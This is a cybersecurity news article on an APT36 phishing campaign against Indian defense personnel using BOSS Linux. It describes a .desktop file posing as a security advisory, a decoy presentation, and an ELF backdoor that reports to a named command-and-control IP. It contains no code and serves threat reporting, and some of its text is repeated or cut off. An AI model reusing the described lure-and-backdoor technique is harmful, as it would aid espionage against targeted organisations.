Indian Defense Targeted with Linux Malware

Written by

admin

in

  • APT36 leveraged the popularity of BOSS Linux to compromise sensitive networks connected to national security.
  • The attackers use a visual decoy in the form of an HTML document pretending to be a cybersecurity advisory.
  •  Upon execution, a malicious ELF binary exfiltrates data and monitors compromised systems.

A cyber-espionage campaign orchestrated by the threat actor APT36, also known as Transparent Tribe, targets Indian defense personnel and organizations using BOSS Linux, a distribution widely employed by Indian government agencies, via malicious archives attached to phishing emails.

This incident marks a significant evolution in APT36’s operational tactics, now incorporating malware specifically engineered for Linux environments.  

According to CYFIRMA’s research, the attack begins with highly targeted phishing emails containing ZIP file attachments. Within these attachments lies a malicious .desktop file masquerading as a “Cyber-Security-Advisory.” 

A .desktop file masquerades as a cybersecurity advisory file

A .desktop file masquerades as a cybersecurity advisory file
A .desktop file masquerades as a cybersecurity advisory file | Source: CYFIRMA

Upon execution, this file initiates a multi-stage process designed to evade detection and lower user suspicion.  

The attack deploys a decoy PowerPoint presentation to gain the target’s trust while simultaneously executing a malicious ELF (Executable and Linkable Format) binary in the background. 

An HTML file containing an

This domain and several associated subdomains have been leveraged in a range of targeted attacks, particularly against personnel and systems within the Indian defense sector

This domain and several associated subdomains have been leveraged in a range of targeted attacks, particularly against personnel and systems within the Indian defense sector
This domain and several associated subdomains have been leveraged in a range of targeted attacks, particularly against personnel and systems within the Indian defense sector | Source: CYFIRMA

Known as “BOSS.elf,” this binary enables unauthorized access to the target system, allowing for data exfiltration and advanced surveillance operations. 

Further technical analysis reveals that the malware collects critical system information, conducts reconnaissance, and maintains persistent communication with a command-and-control (C2) server at 101.99.92.182.  

The ‘sorlastore’ domain was also used in malicious macro-embedded PowerPoint Add-in (PPAM) campaigns targeting Windows.

The campaign’s complexity demonstrates a significant escalation in Transparent Tribe’s capabilities and highlights the increased vulnerabilities of critical systems. APT36 has leveraged the popularity of BOS Linux to compromise sensitive networks connected to national security.

This social engineering approach targeting official entities has been widely used, with recent campaigns including the Russia-affiliated Void Blizzard APT sending fake European Defense & Security Summit emails.

Continue Reading

More posts